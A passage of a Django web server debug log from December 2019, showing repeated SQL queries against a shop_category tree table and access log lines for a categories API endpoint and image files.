"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:15:37,753 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:15:37,757 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:15:37,760 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:15:37,763 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:15:37,765 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:15:37,767 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:15:37,770 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:15:37,772 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:15:37,774 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:15:37,777 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:15:37,779 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:15:37] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 07:15:38] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [27/Dec/2019 07:15:38] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 DEBUG 2019-12-27 07:17:07,539 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:17:07,550 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:17:07,556 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:17:07,561 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:17:07,567 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:17:07,570 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:17:07,574 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:17:07,578 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:17:07,582 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:17:07,588 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:17:07,592 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:17:07,595 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:17:07,599 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:17:07,603 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:17:07,608 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:17:07,612 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:17:07,616 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:17:07,620 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:17:07,624 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:17:07,630 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:17:07,634 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:17:07,638 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:17:07,642 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:17:07,646 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:17:07,650 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:17:07,655 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:17:07,659 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:17:07,663 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:17:07,667 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:17:07,671 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:17:07,677 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:17:07,681 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:17:07,685 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:17:07,689 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:17:07,692 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:17:07,699 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:17:07,703 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:17:07,706 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:17:07,710 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:17:07,714 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:17:07,718 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:17:07,723 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:17:07,727 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:17:07,731 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:17:07,735 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:17:07,739 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:17:07] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 07:17:08,259 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:17:08,270 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:17:08,277 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:17:08,281 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:17:08,287 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:17:08,292 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:17:08,296 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:17:08,300 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:17:08,304 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:17:08,310 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", 